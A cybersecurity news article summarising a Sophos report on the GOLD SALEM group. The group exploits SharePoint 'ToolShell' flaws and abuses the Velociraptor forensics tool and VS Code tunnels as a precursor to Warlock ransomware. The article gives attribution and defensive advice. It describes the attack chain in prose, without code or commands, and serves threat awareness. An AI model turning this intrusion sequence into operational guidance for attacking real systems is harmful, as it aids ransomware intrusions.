GOLD SALEM Abuses Velociraptor DFIR Tool as Ransomware Precursor Following SharePoint ToolShell Exploitation
Ddos 
A sophisticated cybercriminal group has been observed repurposing a legitimate digital forensics tool as a precursor for ransomware attacks, marking a concerning innovation in threat actor tactics. A new report from the Counter Threat Unit (CTU) Research Team at Sophos details how the group, tracked as GOLD SALEM, is using the open-source Velociraptor tool to facilitate intrusions that ultimately deploy the Warlock ransomware.
Velociraptor is widely recognized in the cybersecurity industry as a powerful tool for digital forensics and incident response (DFIR), used by defenders to hunt for threats and collect evidence. However, since mid-August 2025, CTU researchers have identified its abuse in “likely ransomware precursor activity”.
In observed incidents, the threat actors downloaded the Velociraptor installer (often named v2.msi or v3.msi) from attacker-controlled subdomains on workers.dev. Once installed, the tool was used to execute malicious commands, including installing Visual Studio Code in tunnel mode to establish command-and-control (C2) channels.
“While Velociraptor is a legitimate, off-the-shelf tool used for digital forensics and incident response, its download from attacker-controlled infrastructure indicates malicious use,” the report notes. This “living off the land” approach allows attackers to blend their activities with legitimate administrative tasks, complicating detection efforts.
The group’s initial access methods are equally aggressive. In several incidents, GOLD SALEM exploited zero-day vulnerabilities in on-premises SharePoint servers, a technique Microsoft refers to as “ToolShell.”
In one notable August intrusion, a compromised SharePoint process (w3wp.exe) spawned an installer (msiexec.exe) that fetched the malicious Velociraptor payload directly from an attacker’s Cloudflare Worker domain. This demonstrates the group’s ability to chain vulnerability exploitation with post-compromise tooling rapidly.
While the end goal appears to be financial extortion, GOLD SALEM’s ransomware toolkit is diverse. Researchers observed the group deploying Warlock, LockBit 3.0, and Babuk variants.
Warlock, likely based on leaked LockBit 3.0 code, typically appends extensions like .x2anylock to encrypted files. Interestingly, the group’s victimology suggests motives beyond simple profit. The target list includes organizations in telecommunications, nuclear energy, and aerospace—sectors that “would be of interest to Chinese state-sponsored groups involved in intelligence gathering and cyberespionage”.
CTU researchers link GOLD SALEM to a China-based threat cluster Microsoft tracks as Storm-2603. While the group appears financially motivated, their use of tools like Cloudflare Workers and specific vulnerable drivers (rsndispot.sys signed by Beijing Rising Network Security) aligns with tactics common among Chinese threat actors.
“CTU assess with low confidence that GOLD SALEM is at least partially composed of Chinese individuals,” citing their willingness to attack targets in Russia and Taiwan as further evidence.
Organizations are urged to evaluate the necessity of exposing SharePoint servers to the internet and to ensure all internet-facing systems are patched against known exploits like ToolShell. Furthermore, “broad and comprehensive deployment of AV and EDR solutions have been effective at detecting this threat group’s activity at an early stage”.
Donate